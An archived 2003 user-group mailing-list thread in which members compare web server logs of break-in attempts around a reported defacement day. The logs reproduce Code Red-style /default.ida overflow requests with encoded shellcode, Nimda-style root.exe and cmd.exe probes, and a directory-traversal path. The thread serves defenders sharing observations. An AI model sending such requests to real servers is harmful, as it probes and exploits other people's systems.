Email address obfuscation in effect -- please
click here to turn it off.
[
Date Prev][
Date Next][
Thread Prev][
Thread Next][
Date Index][
Thread Index]
naw.. mine is just from one ISP so far
12-236-239-189.client.attbi.com - - [02/Jul/2003:21:52:46 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 308
12-241-5-150.client.attbi.com - - [02/Jul/2003:22:41:26 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 308
12-234-17-57.client.attbi.com - - [01/Jul/2003:21:05:53 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$
12-239-245-216.client.attbi.com - - [01/Jul/2003:22:01:41 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 293
12-239-245-216.client.attbi.com - - [01/Jul/2003:22:01:41 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 291
12-239-245-216.client.attbi.com - - [01/Jul/2003:22:01:42 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
12-239-245-216.client.attbi.com - - [01/Jul/2003:22:01:42 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
[Wed Jul 02 06:43:56 2003] [error] [client 12.246.137.69] File does not
exist: /home/httpd/html/default.ida
[Wed Jul 02 15:24:56 2003] [error] [client 12.234.58.237] File does not
exist: /home/httpd/html/default.ida
[Wed Jul 02 21:52:46 2003] [error] [client 12.236.239.189] File does not
exist: /home/httpd/html/default.ida
[Wed Jul 02 22:41:26 2003] [error] [client 12.241.5.150] File does not
exist: /home/httpd/html/default.ida
[Wed Jul 02 23:47:54 2003] [error] [client 66.196.65.39] File does not
exist: /home/httpd/html/robots.txt
[Thu Jul 03 00:02:09 2003] [error] [client 12.210.210.48] File does not
exist: /home/httpd/html/default.ida
On Wed, 2 Jul 2003, Robb III, George B. wrote:
>
> Have you noticed any connections from a specific location?
>
> I have had a large number of "hits" from *.*.ac.kr... and a few from random sites in .de I can be more specific off list if you want...
>
> George
>
> -----Original Message-----
> From: Montgomery-Smith, Stephen
> Sent: Wed 7/2/2003 11:04 PM
> To: MLUG Off-Topic Discussion
> Cc:
> Subject: Re: [MLUG - DISCUSSION] website defacement day
> Michael wrote:
> > Dunno how serious to take the threat but it wouldn't hurt to upgrade
> > your web servers. Obviously that includes the web server itself and all
> > additional software on the server that could be used for entry. :)
> >
> > http://www.sfgate.com/cgi-bin/article.cgi?f=/news/archive/2003/07/02/financial1239EDT0109.DTL&type=tech
> >
> >
>
> I am seeing quite a lot of break in attempts on my lowly web server. I am
> getting connection attempts to port 1433, which looks like some kind of SQL
> port. I am also getting a lot of attempts to look at files like
> /usr/local/www/data/scripts/..%5c../winnt/system32/cmd.exe on my web server.
>
>
>
> --
> Stephen Montgomery-Smith
> EMAIL:PROTECTED
> http://www.math.missouri.edu/~stephen
>
> _______________________________________________
> discussion mailing list
> EMAIL:PROTECTED
> http://mlug.missouri.edu/mailman/listinfo/discussion
>
>
>
>
_______________________________________________
discussion mailing list
EMAIL:PROTECTED
http://mlug.missouri.edu/mailman/listinfo/discussion
Home | FAQ | Server | Presentations | Mailing Lists/Archives | Member Tools | Links | Sponsors | Contact